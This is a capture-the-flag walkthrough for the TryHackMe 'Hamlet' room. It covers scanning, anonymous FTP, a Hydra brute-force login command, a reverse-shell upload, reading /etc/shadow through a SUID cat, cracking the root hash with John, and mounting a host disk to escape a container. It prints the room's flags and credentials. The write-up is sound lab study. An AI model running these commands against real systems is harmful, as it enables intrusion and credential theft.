Halmet (FTP, Web, Hydra, Container)

First, we need to enumerate using rustscan.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  rustscan -a 10.10.74.234 -- -A | tee rust.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.74.234:21
Open 10.10.74.234:22
Open 10.10.74.234:80
Open 10.10.74.234:501
Open 10.10.74.234:8000
Open 10.10.74.234:8080
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-22 04:38 +0630
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Initiating Ping Scan at 04:38
Scanning 10.10.74.234 [2 ports]
Completed Ping Scan at 04:38, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:38
Completed Parallel DNS resolution of 1 host. at 04:38, 0.32s elapsed
DNS resolution of 1 IPs took 0.32s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:38
Scanning 10.10.74.234 [6 ports]
Discovered open port 22/tcp on 10.10.74.234
Discovered open port 8080/tcp on 10.10.74.234
Discovered open port 21/tcp on 10.10.74.234
Discovered open port 80/tcp on 10.10.74.234
Discovered open port 8000/tcp on 10.10.74.234
Discovered open port 501/tcp on 10.10.74.234
Completed Connect Scan at 04:38, 0.33s elapsed (6 total ports)
Initiating Service scan at 04:38
Scanning 6 services on 10.10.74.234
Completed Service scan at 04:38, 28.66s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.74.234.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
NSE: [ftp-bounce 10.10.74.234:21] PORT response: 500 Illegal PORT command.
Completed NSE at 04:38, 13.82s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 1.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Nmap scan report for 10.10.74.234
Host is up, received syn-ack (0.28s latency).
Scanned at 2022-04-22 04:38:07 +0630 for 45s

PORT     STATE SERVICE    REASON  VERSION
21/tcp   open  ftp        syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md
|_-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.0.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh        syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ef:4c:32:28:a6:4c:7f:60:d6:a6:63:32:ac:ab:27 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5/i3O28uWolhittypXr6mAEk+XOV998o/e/3wIWpGq9J1GhtGc3J4uwYpBt7SiS3mZivq9D5jgFhqhHb6zlBsQmGUnXUnQNYyqrBmGnyl4urp5IuV1sRCdNXQdt/lf6Z9A807OPuCkzkAexFUV28eXqdXpRsXXkqgkl5DCm2WEtV7yxPIbGlcmX+arDT9A5kGTZe9rNDdqzSafz0aVKRWoTHGHuqVmq0oPD3Cc3oYfoLu7GTJV+Cy6Hxs3s6oUVcruoi1JYvbxC9whexOr+NSZT9mGxDSDLS6jEMim2DQ+hNhiT49JXcMXhQ2nOYqBXLZF0OYyNKaGdgG35CIT40z
|   256 5a:6d:1a:39:97:00:be:c7:10:6e:36:5c:7f:ca:dc:b2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHtt/3Q8agNKO48Zw3srosCs+bfCx47O+i4tBUX7VGMSpzTJQS3s4DBhGvrvO+d/u9B4e9ZBgWSqo+aDqGsTZxQ=
|   256 0b:77:40:b2:cc:30:8d:8e:45:51:fa:12:7c:e2:95:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN4jv01JeDGsDfhWIJMF8HBv26FI18VLpBeNoiSGbKVp
80/tcp   open  http       syn-ack lighttpd 1.4.45
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: lighttpd/1.4.45
|_http-title: Hamlet Annotation Project
501/tcp  open  tcpwrapped syn-ack
8000/tcp open  http       syn-ack Apache httpd 2.4.48 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open  http-proxy syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 500 
|     Content-Type: application/json;charset=UTF-8
|     Date: Thu, 21 Apr 2022 22:07:15 GMT
|     Connection: close
|     {"timestamp":1650578836324,"status":500,"error":"Internal Server Error","exception":"org.springframework.security.web.firewall.RequestRejectedException","message":"The request was rejected because the URL contained a potentially malicious String "%2e"","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 302 
|     Set-Cookie: JSESSIONID=F8DCBDEE2802FAC1360A8FCD3F336AAF; Path=/; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: SAMEORIGIN
|     Location: http://localhost:8080/login.html
|     Content-Length: 0
|     Date: Thu, 21 Apr 2022 22:07:14 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 302 
|     Set-Cookie: JSESSIONID=17B11B72A74402B64F4CFCC41497126B; Path=/; HttpOnly
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: SAMEORIGIN
|     Location: http://localhost:8080/login.html
|     Content-Length: 0
|     Date: Thu, 21 Apr 2022 22:07:14 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Thu, 21 Apr 2022 22:07:15 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-favicon: Unknown favicon MD5: 0488FACA4C19046B94D07C3EE83CF9D6
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
| http-title: WebAnno - Log in 
|_Requested resource was http://10.10.74.234:8080/login.html
|_http-trane-info: Problem with XML parsing of /evox/about
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=4/22%Time=6261D5CF%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,18F,"HTTP/1\.1\x20302\x20\r\nSet-Cookie:\x20JSESSIONID=F8DCBDE
SF:E2802FAC1360A8FCD3F336AAF;\x20Path=/;\x20HttpOnly\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nCache-Cont
SF:rol:\x20no-cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nPrag
SF:ma:\x20no-cache\r\nExpires:\x200\r\nX-Frame-Options:\x20SAMEORIGIN\r\nL
SF:ocation:\x20http://localhost:8080/login\.html\r\nContent-Length:\x200\r
SF:\nDate:\x20Thu,\x2021\x20Apr\x202022\x2022:07:14\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n")%r(HTTPOptions,18F,"HTTP/1\.1\x20302\x20\r\nSet-Cooki
SF:e:\x20JSESSIONID=17B11B72A74402B64F4CFCC41497126B;\x20Path=/;\x20HttpOn
SF:ly\r\nX-Content-Type-Options:\x20nosniff\r\nX-XSS-Protection:\x201;\x20
SF:mode=block\r\nCache-Control:\x20no-cache,\x20no-store,\x20max-age=0,\x2
SF:0must-revalidate\r\nPragma:\x20no-cache\r\nExpires:\x200\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nLocation:\x20http://localhost:8080/login\.html\r
SF:\nContent-Length:\x200\r\nDate:\x20Thu,\x2021\x20Apr\x202022\x2022:07:1
SF:4\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1
SF:\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lang
SF:uage:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Thu,\x2021\x20Apr\x20
SF:2022\x2022:07:15\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20htm
SF:l><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x
SF:93\x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font-f
SF:amily:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:whi
SF:te;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font
SF:-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\
SF:x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;bor
SF:der:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x9
SF:3\x20Bad\x20Request</h1></body></html>")%r(FourOhFourRequest,1A4,"HTTP/
SF:1\.1\x20500\x20\r\nContent-Type:\x20application/json;charset=UTF-8\r\nD
SF:ate:\x20Thu,\x2021\x20Apr\x202022\x2022:07:15\x20GMT\r\nConnection:\x20
SF:close\r\n\r\n{\"timestamp\":1650578836324,\"status\":500,\"error\":\"In
SF:ternal\x20Server\x20Error\",\"exception\":\"org\.springframework\.secur
SF:ity\.web\.firewall\.RequestRejectedException\",\"message\":\"The\x20req
SF:uest\x20was\x20rejected\x20because\x20the\x20URL\x20contained\x20a\x20p
SF:otentially\x20malicious\x20String\x20\\\"%2e\\\"\",\"path\":\"/nice%20p
SF:orts%2C/Tri%6Eity\.txt%2ebak\"}");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:38
Completed NSE at 04:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.84 seconds

Port 21

You can't list the current file list in normal way.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.

You need to enable passive mode.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> dir \
227 Entering Passive Mode (10,10,24,134,199,33).
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0             113 Sep 15  2021 password-policy.md
-rw-r--r--    1 0        0            1425 Sep 15  2021 ufw.status
226 Directory send OK.

Download this two files.

ftp> get password-policy.md
local: password-policy.md remote: password-policy.md
227 Entering Passive Mode (10,10,24,134,195,187).
150 Opening BINARY mode data connection for password-policy.md (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (175.7190 kB/s)
ftp> get ufw.status
local: ufw.status remote: ufw.status
227 Entering Passive Mode (10,10,24,134,197,37).
150 Opening BINARY mode data connection for ufw.status (1425 bytes).
226 Transfer complete.
1425 bytes received in 0.00 secs (1.6314 MB/s)

Read the files. Password Policy file is quite interesting.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  cat password-policy.md 
# Password Policy

## WebAnno

New passwords should be:

- lowercase
- between 12 and 14 characters long
╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  cat ufw.status 
Status: active

To                         Action      From
--                         ------      ----
20/tcp                     ALLOW       Anywhere                  
21/tcp                     ALLOW       Anywhere                  
22/tcp                     ALLOW       Anywhere                  
80/tcp                     ALLOW       Anywhere                  
501/tcp                    ALLOW       Anywhere                  
8080/tcp                   ALLOW       Anywhere                  
8000/tcp                   ALLOW       Anywhere                  
1603/tcp                   ALLOW       Anywhere                  
1564/tcp                   ALLOW       Anywhere                  
50000:50999/tcp            ALLOW       Anywhere                  
20/tcp (v6)                ALLOW       Anywhere (v6)             
21/tcp (v6)                ALLOW       Anywhere (v6)             
22/tcp (v6)                ALLOW       Anywhere (v6)             
80/tcp (v6)                ALLOW       Anywhere (v6)             
501/tcp (v6)               ALLOW       Anywhere (v6)             
8080/tcp (v6)              ALLOW       Anywhere (v6)             
8000/tcp (v6)              ALLOW       Anywhere (v6)             
1603/tcp (v6)              ALLOW       Anywhere (v6)             
1564/tcp (v6)              ALLOW       Anywhere (v6)             
50000:50999/tcp (v6)       ALLOW       Anywhere (v6)

Port 80

You can see the default webpage.

Attach ip and domain name in /etc/hosts.

echo '10.10.74.234	hamlet.thm' >> /etc/hosts

In robots.txt, you will see flag1.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  curl http://10.10.74.234/robots.txt
User-agent: *
Allow: /

THM{1_most_mechanical_and_dirty_hand}

Digging sub directory using gobuster.

Nothing interesting

Port 501

You can grep your second flag by connecting port using nc and answering question. Here is the

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  nc 10.10.74.234 501
GRAVEDIGGER
What do you call a person who builds stronger things than a stonemason, a shipbuilder, or a carpenter does?
PENTESTER
The one who builds the gallows to hang people on, since his structure outlives a thousand inhabitants.
THM{2_ophelia_s_grave}

Port 8000

When you browser to http://10.10.74.234:8000/, it shows only some of the useless text. You will found something after inspect it.

<iframe style="width:100%; height:100%" src="/repository/project/0/document/0/source/hamlet.txt"></iframe>

Let's use gobuster to enumerate it.

Nothing interesting

Port 8080

When you browser to http://10.10.74.234:8080/login.html, you will see default webanno page. You can found username on http://10.10.74.234/, which is ghost. password-policy.md said New Passwords should be between 12 and 14 characters long. So, we need to generate password from http://10.10.74.234:8080.

cewl -m 12 http://10.10.74.234:8000/repository/project/0/document/0/source/hamlet.txt > pass.txt

Bruteforce using hydra.

hydra -l ghost -P pass.txt 10.10.74.234 -s 8080 http-post-form "/login.html?-1.-loginForm:urlfragment=&username=^USER^&password=^PASS^&Login=Login:'Login failed'"

I successfully bruteforce using burp. Here is complete credential ghost:vnsanctified

In project page, you can find different user.

After you changed the password of ophelia and login back again, you can find different ftp password KEQehFDWwuQbMbKW

You can find 3rd flag by connecting ftp with ophelia:vnsanctified

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  ftp 10.10.74.234
Connected to 10.10.74.234.
220 (vsFTPd 3.0.3)
Name (10.10.74.234:hnl): ophelia
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,229,96,195,232).
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           31 Sep 16  2021 flag
226 Directory send OK.
ftp> get flag
local: flag remote: flag
227 Entering Passive Mode (10,10,229,96,197,61).
150 Opening BINARY mode data connection for flag (31 bytes).
226 Transfer complete.
31 bytes received in 0.01 secs (5.9676 kB/s)
ftp> 

You can find 4rd flag at /opt.

ftp> pwd
257 "/home/ophelia" is the current directory
ftp> cd /
250 Directory successfully changed.
ftp> dir
227 Entering Passive Mode (10,10,229,96,198,75).
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Sep 15  2021 bin
drwxr-xr-x    4 0        0            4096 Sep 15  2021 boot
drwxr-xr-x    2 0        0            4096 Sep 15  2021 cdrom
drwxr-xr-x   18 0        0            3760 Apr 22 23:20 dev
drwxr-xr-x   99 0        0            4096 Sep 16  2021 etc
drwxr-xr-x    5 0        0            4096 Sep 15  2021 home
lrwxrwxrwx    1 0        0              34 Sep 15  2021 initrd.img -> boot/initrd.img-4.15.0-156-generic
lrwxrwxrwx    1 0        0              34 Sep 15  2021 initrd.img.old -> boot/initrd.img-4.15.0-156-generic
drwxr-xr-x   23 0        0            4096 Sep 15  2021 lib
drwxr-xr-x    2 0        0            4096 Aug 06  2020 lib64
drwx------    2 0        0           16384 Sep 15  2021 lost+found
drwxr-xr-x    2 0        0            4096 Aug 06  2020 media
drwxr-xr-x    3 0        0            4096 Sep 15  2021 mnt
drwxr-xr-x    5 0        0            4096 Sep 15  2021 opt
dr-xr-xr-x  115 0        0               0 Apr 22 23:20 proc
drwx------    5 0        0            4096 Sep 15  2021 root
drwxr-xr-x   30 0        0            1020 Apr 22 23:25 run
drwxr-xr-x    2 0        0           12288 Sep 15  2021 sbin
drwxr-xr-x    2 0        0            4096 Sep 15  2021 snap
drwxr-xr-x    4 0        0            4096 Sep 15  2021 srv
-rw-------    1 0        0        4111466496 Sep 15  2021 swap.img
dr-xr-xr-x   13 0        0               0 Apr 22 23:20 sys
drwxrwxrwt    9 0        0            4096 Apr 22 23:25 tmp
drwxr-xr-x   10 0        0            4096 Aug 06  2020 usr
drwxr-xr-x   14 0        0            4096 Sep 15  2021 var
lrwxrwxrwx    1 0        0              31 Sep 15  2021 vmlinuz -> boot/vmlinuz-4.15.0-156-generic
lrwxrwxrwx    1 0        0              31 Sep 15  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-156-generic
226 Directory send OK.
ftp> cd /opt
250 Directory successfully changed.
ftp> ls
227 Entering Passive Mode (10,10,229,96,196,56).
150 Here comes the directory listing.
drwx--x--x    4 0        0            4096 Sep 15  2021 containerd
drwxr-xr-x    2 0        0            4096 Sep 15  2021 stage
drwxr-xr-x    2 0        0            4096 Sep 15  2021 web
226 Directory send OK.
ftp> cd stage
250 Directory successfully changed.
ftp> dir
227 Entering Passive Mode (10,10,229,96,197,175).
150 Here comes the directory listing.
-rw-r--r--    1 0        0              29 Sep 16  2021 flag
226 Directory send OK.
ftp> get flag
local: flag remote: flag
227 Entering Passive Mode (10,10,229,96,197,72).
150 Opening BINARY mode data connection for flag (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (20.1855 kB/s)

User

Let's upload a reverse shell.

Call back the curl.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet  
╰─➤  curl http://10.10.74.234:8000/repository/project/0/document/1/source/rev.php

In netcat session, we got a reverse shell.

Find Interesting permission which is running with root.

$ find / -type f -user root -perm -4000 2>/dev/null
/bin/umount
/bin/mount
/bin/cat
/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh

With cat command, we can read shadows file.

$ /bin/cat /etc/shadow
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:18885:0:99999:7:::
daemon:*:18872:0:99999:7:::
bin:*:18872:0:99999:7:::
sys:*:18872:0:99999:7:::
sync:*:18872:0:99999:7:::
games:*:18872:0:99999:7:::
man:*:18872:0:99999:7:::
lp:*:18872:0:99999:7:::
mail:*:18872:0:99999:7:::
news:*:18872:0:99999:7:::
uucp:*:18872:0:99999:7:::
proxy:*:18872:0:99999:7:::
www-data:*:18872:0:99999:7:::
backup:*:18872:0:99999:7:::
list:*:18872:0:99999:7:::
irc:*:18872:0:99999:7:::
gnats:*:18872:0:99999:7:::
nobody:*:18872:0:99999:7:::
_apt:*:18872:0:99999:7:::

$ /bin/cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Unshadow the file.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow  
╰─➤  unshadow ./passwd ./shadow > unshadowed

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow  
╰─➤  cat unshadowed
root:$y$j9T$.9s2wZRY3hcP/udKIFher1$sIBIYsiMmFlXhKOO4ZDJDXo54byuq7a4xAD0k9jw2m4:0:0:root:/root:/bin/bash

Crack password using john the ripper.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/hamlet/shadow  
╰─➤  john unshadowed --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
murder           (root)
1g 0:00:01:32 100% 0.01083g/s 53.03p/s 53.03c/s 53.03C/s yessica..FUCKYOU
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Change to root user.

$ su root
Password: murder
whoami
root

Read the flag.

cd /root
ls
ls -al
total 20
drwx------ 1 root root 4096 Sep 15  2021 .
drwxr-xr-x 1 root root 4096 Sep 15  2021 ..
-rw-r--r-- 1 root root  571 Apr 10  2021 .bashrc
-rw-r--r-- 1 root root   24 Sep 16  2021 .flag
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
cat .flag
THM{5_murder_most_foul}

Root

Humm?? What is dm-0

ls -al /dev/ | grep disk
crw-rw----  1 root disk     10, 234 Apr 23 01:46 btrfs-control
brw-rw----  1 root disk    253,   0 Apr 23 01:46 dm-0
crw-rw----  1 root disk     10, 237 Apr 23 01:46 loop-control
brw-rw----  1 root disk      7,   0 Apr 23 01:46 loop0
brw-rw----  1 root disk      7,   1 Apr 23 01:46 loop1
brw-rw----  1 root disk      7,   2 Apr 23 01:46 loop2
brw-rw----  1 root disk      7,   3 Apr 23 01:46 loop3
brw-rw----  1 root disk      7,   4 Apr 23 01:46 loop4
brw-rw----  1 root disk      7,   5 Apr 23 01:46 loop5
brw-rw----  1 root disk      7,   6 Apr 23 01:46 loop6
brw-rw----  1 root disk      7,   7 Apr 23 01:46 loop7
brw-rw----  1 root disk    202,   0 Apr 23 01:46 xvda
brw-rw----  1 root disk    202,   1 Apr 23 01:46 xvda1
brw-rw----  1 root disk    202,   2 Apr 23 01:46 xvda2
brw-rw----  1 root disk    202,   3 Apr 23 01:46 xvda3
brw-rw----  1 root disk    202, 112 Apr 23 01:46 xvdh

Mount the disk.

mkdir /root/lol       
mount /dev/dm-0 /root/lol
ls -al /root/lol
total 4015224
drwxr-xr-x 24 root root       4096 Sep 15  2021 .
drwx------  1 root root       4096 Apr 23 02:17 ..
drwxr-xr-x  2 root root       4096 Sep 15  2021 bin
drwxr-xr-x  2 root root       4096 Sep 15  2021 boot
drwxr-xr-x  2 root root       4096 Sep 15  2021 cdrom
drwxr-xr-x  4 root root       4096 Aug  6  2020 dev
drwxr-xr-x 99 root root       4096 Sep 16  2021 etc
drwxr-xr-x  5 root root       4096 Sep 15  2021 home
lrwxrwxrwx  1 root root         34 Sep 15  2021 initrd.img -> boot/initrd.img-4.15.0-156-generic
lrwxrwxrwx  1 root root         34 Sep 15  2021 initrd.img.old -> boot/initrd.img-4.15.0-156-generic
drwxr-xr-x 23 root root       4096 Sep 15  2021 lib
drwxr-xr-x  2 root root       4096 Aug  6  2020 lib64
drwx------  2 root root      16384 Sep 15  2021 lost+found
drwxr-xr-x  2 root root       4096 Aug  6  2020 media
drwxr-xr-x  3 root root       4096 Sep 15  2021 mnt
drwxr-xr-x  5 root root       4096 Sep 15  2021 opt
drwxr-xr-x  2 root root       4096 Apr 24  2018 proc
drwx------  5 root root       4096 Sep 15  2021 root
drwxr-xr-x 13 root root       4096 Aug  6  2020 run
drwxr-xr-x  2 root root      12288 Sep 15  2021 sbin
drwxr-xr-x  2 root root       4096 Sep 15  2021 snap
drwxr-xr-x  4 root root       4096 Sep 15  2021 srv
-rw-------  1 root root 4111466496 Sep 15  2021 swap.img
drwxr-xr-x  2 root root       4096 Apr 24  2018 sys
drwxrwxrwt  9 root root       4096 Apr 23 02:09 tmp
drwxr-xr-x 10 root root       4096 Aug  6  2020 usr
drwxr-xr-x 14 root root       4096 Sep 15  2021 var
lrwxrwxrwx  1 root root         31 Sep 15  2021 vmlinuz -> boot/vmlinuz-4.15.0-156-generic
lrwxrwxrwx  1 root root         31 Sep 15  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-156-generic

Read the final flag.

cd /root/lol/root/
dir
flag
cat flag
THM{6_though_this_be_madness_yet_there_is_method_in_t}